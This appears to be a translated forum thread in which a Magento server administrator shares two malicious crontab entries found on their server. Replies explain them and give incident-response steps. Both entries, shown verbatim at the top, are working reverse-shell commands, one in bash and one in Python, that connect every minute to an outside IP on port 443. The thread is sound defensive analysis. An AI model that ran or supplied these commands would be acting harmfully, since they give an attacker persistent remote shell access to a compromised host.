crontab -l | { cat; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/80.78.26.82/443 0>&1'"; } | crontab -
crontab -l | { cat; echo "* * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("80.78.26.82",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"; } | crontab -
在我们的 Magento 1.7 服务器上找到这个 托管在 AWS - NGINX Ubuntu
Stack 已大幅更新,但受 cloudflare 防火墙保护。
我可能是错的,但我认为您已被黑客攻击,并且 IP 地址属于您的黑客
80.78.26.82这将与您的黑客打开一个套接字。
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("80.78.26.82",443));
同时
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
这三行本质上将标准输入、输出和错误流重定向到打开的套接字。这意味着 shell 的任何输入/输出都将发送给攻击者。
p=subprocess.call(["/bin/sh","-i"])
注意到最后的
-i我认为你应该立即隔离该服务器并在其他服务器中搜索恶意软件。
我不是安全专家:我不知道这样做是否正确。您能从您的服务器 ping 通该 IP 地址吗?如果可以的话防火墙已经被破坏了。
边想:如果你的黑客还没有安装勒索软件,也许他还没有能力做到这一点,或者这不是他的目标???
根据您共享的命令,您的服务器似乎确实已受到威胁。这些命令设置一个反向 shell,允许外部系统(在本例中为 IP 地址 80.78.26.82 的系统)在您的服务器上执行命令。这是网络攻击中常用的技术。
第一个命令是设置一个 cron 作业每分钟运行一次。该作业执行 bash shell 并将其输入和输出重定向到与外部系统的 TCP 连接。第二个命令执行类似的操作,但使用 Python 来设置套接字连接并执行 shell。
如果您自己没有添加这些命令,那么您的服务器很可能已被黑客入侵。您应该立即采取行动以减轻损失。您可以采取以下步骤:
隔离服务器:将其与网络断开连接,以防止攻击者执行进一步的命令或传播到网络上的其他系统。
调查:尝试确定攻击者如何访问您的服务器。检查您的服务器日志是否有任何可疑活动。查找攻击者可能对您的系统进行的任何其他更改。
清理:删除恶意 cron 作业以及攻击者所做的任何其他更改。请注意,如果攻击者获得 root 访问权限,他们可能会进行难以检测或删除的更改。
更新和修补:确保您的服务器及其所有软件均已完全更新和修补。这有助于防止未来的攻击。
提高安全性:考虑实施额外的安全措施,例如防火墙、入侵检测系统或定期安全审核。
报告:考虑向当地政府和 AWS 报告该事件。他们也许能够提供额外的帮助或建议。
请记住,处理安全漏洞可能非常复杂且具有挑战性。您可能需要考虑获得专业帮助,尤其是在处理敏感或有价值的数据时。”